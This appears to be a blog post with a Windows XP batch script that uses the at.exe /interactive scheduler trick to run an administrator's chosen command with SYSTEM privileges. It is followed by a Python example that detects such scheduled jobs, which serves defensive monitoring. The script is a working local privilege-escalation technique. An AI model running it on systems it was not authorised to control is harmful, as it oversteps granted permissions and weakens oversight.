Administrator to System privilege escalation

Windows XP. There comes a time in every Windows user's life when he wants more. Administrator access isn't enough. He wants to have the same level of access that the System has.

Maybe it's to kill a stubborn process which looks like a virus but actually turns out to be a critical System process, or maybe it's just so they can laugh maniacally.

Whatever the reason, I have created a script to give Administrator users SYSTEM level access to their Windows XP computers:


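@echo off
echo.
rem "at" with no arguments only lists jobs; it fails for non-administrators.
at>nul
if "%errorlevel%"=="1" (
  echo You do not have sufficient privileges to execute this command.
  echo You MUST be running as an administrator ^(with access to "at.exe"^).
  goto end
)
echo WARNING: This command will be executed with SYSTEM privileges!
echo.
set /P cmd=Enter command to run (eg,"cmd", "taskmgr"): 

rem Capture the first line printed by "time" through a temporary file.
set rnd=r%random%n%random%d
echo.|time>%rnd%
set /P time=<%rnd%
del /F /Q %rnd%
rem Assumes the English 24-hour output "The current time is: HH:MM:SS.cc".
for /F "usebackq tokens=5,6,7 delims=:. " %%i in ('%time%') do (
  set our=%%i
  set min=%%j
  set sec=%%k
)
rem Prefix 100 and take modulo 100 so 08 and 09 are not read as invalid octal.
set /A "tot=(100%min% %% 100) + 1"
set /A "dif=60 - (100%sec% %% 100)"
rem Minute 59 rolls over to minute 0 of the next hour (wrapping at midnight).
if %tot% GEQ 60 (
  set /A "tot=0"
  set /A "our=(100%our% %% 100 + 1) %% 24"
)
at %our%:%tot% /interactive %cmd% >nul
if "%errorlevel%"=="0" (
  echo The command will be executed in %dif% seconds.
) else (
  echo An unknown error has occurred.
)

:end
echo Press any key to exit.
pause>nul

Save the code as a .bat file, and run!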

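This script uses the old at.exe trick to escalate your privs: jobs scheduled with at.exe are run by the Task Scheduler service, which runs as SYSTEM, and /interactive lets the job appear on your desktop. The script fills in the parameters automatically, so all you need to do is say what command you want to execute with your system privs.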

PS: You DO need administrator access to run this script, so it's useless to most baddies. This is only useful if you want to increase from administrator to system.
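
On the monitoring side, the same trick is easy to spot because every job it creates is an at.exe invocation with a time and /interactive. The following is an added example, not part of the original post: it parses process command lines and flags at.exe jobs scheduled with /interactive. The function names and the input format (one command line per string) are assumptions of this example.

```python
import re

# Program name: at, at.exe, or any path ending in \at.exe (case-insensitive).
AT_PROGRAM = re.compile(r'^(?:.*[\\/])?at(?:\.exe)?$', re.IGNORECASE)
# Prefix match on H:M so "12:5", as the script can emit, is still recognised.
AT_TIME = re.compile(r'\d{1,2}:\d{1,2}')

def split_cmdline(line):
    """Split on whitespace, keeping double-quoted runs as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', line)]

def parse_at_job(cmdline):
    """Return the job an at.exe command line creates, or None when the line
    is not at.exe or only lists or deletes jobs."""
    tokens = split_cmdline(cmdline)
    if not tokens or not AT_PROGRAM.match(tokens[0]):
        return None
    rest = tokens[1:]
    host = rest.pop(0) if rest and rest[0].startswith("\\\\") else None
    if not rest or not AT_TIME.match(rest[0]):
        return None  # "at", "at <id>" or "/delete": nothing is scheduled
    time = rest.pop(0)
    switches = []
    while rest and rest[0].startswith("/"):
        switches.append(rest.pop(0).lower())
    return {"host": host, "time": time,
            "interactive": "/interactive" in switches,
            "command": " ".join(rest) or None}

def flag_interactive_jobs(lines):
    """Return (line, job) for each at.exe job scheduled with /interactive."""
    parsed = ((line, parse_at_job(line)) for line in lines)
    return [(l, j) for l, j in parsed if j and j["interactive"] and j["command"]]

# Constructed sample command lines, not captured from a real system.
SAMPLE = [
    r'at 14:35 /interactive cmd',
    r'C:\WINDOWS\system32\at.exe 9:05 /INTERACTIVE "taskmgr"',
    r'at',
    r'at 3 /delete',
    r'at 23:00 /every:M,T,W backup.bat',
    r'attrib +r notes.txt',
]

if __name__ == "__main__":
    for line, job in flag_interactive_jobs(SAMPLE):
        print("ALERT", job["time"], job["command"], "<-", line)
```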
